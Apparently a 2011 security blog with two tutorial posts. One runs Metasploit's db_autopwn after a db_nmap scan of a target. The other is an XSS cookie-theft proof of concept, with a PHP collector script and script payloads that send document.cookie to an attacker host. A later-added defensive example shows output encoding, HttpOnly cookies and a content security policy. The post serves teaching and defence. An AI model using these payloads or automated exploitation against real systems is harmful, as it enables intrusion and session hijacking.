Tuesday, May 31, 2011
Wednesday, May 25, 2011
Friday, May 6, 2011
Metasploit db_autopwn (Postgres)
Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
...
Step 3: Use nmap to enumerate the services of the target system(s).
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
Step 4: Run automated exploitation.
msf exploit(psexec) > db_autopwn -p -t -e -b
Monday, May 2, 2011
How to steal cookies via XSS
This is a proof of concept demonstrating the fundamentals of stealing cookies via XSS:
There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php".
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
As you can see, all the server code does is take in a GET request and write the 'code' attribute from the $_GET request variable to a file.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>
or
<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>
The code above creates an image whose source points to our malicious server. The request populates the GET variable "code", which the server expects to read and write.
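From the defender's side, the payloads above stop working when the vulnerable page encodes reflected input for its HTML context and the session cookie is marked HttpOnly. The following is an added example, not code from the original post; it is plain Node.js-style JavaScript, and the function names, the page template and the `sid` cookie name are assumptions made for illustration.

```javascript
// Added example: the vulnerable reflection beside its hardened form.
// All names here (renderVulnerable, renderHardened, "sid") are hypothetical.

// Encode the characters that let text break out of HTML element or
// quoted-attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Before: input is concatenated into markup, so a <script> element in it runs.
function renderVulnerable(q) {
  return '<p>Results for: ' + q + '</p>';
}

// After: input is encoded for the HTML context it is written into.
function renderHardened(q) {
  return '<p>Results for: ' + escapeHtml(q) + '</p>';
}

// HttpOnly keeps the cookie out of document.cookie, Secure restricts it to
// HTTPS, SameSite limits when it is sent on cross-site requests.
function sessionCookieHeader(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Response headers for the hardened page. The CSP is a second layer: it
// blocks inline scripts and limits image loads to the page's own origin.
function hardenedHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; img-src 'self'",
    'Set-Cookie': sessionCookieHeader('sid', sessionId),
  };
}

// Constructed sample input: the payload shape from the post after URL decoding.
const SAMPLE = "<script>new Image().src='[malicious_host]/malicious.php?code='+document.cookie</script>";

console.log(renderVulnerable(SAMPLE)); // markup still contains a live <script>
console.log(renderHardened(SAMPLE));   // payload is rendered as inert text
console.log(hardenedHeaders('constructed-session-id'));
```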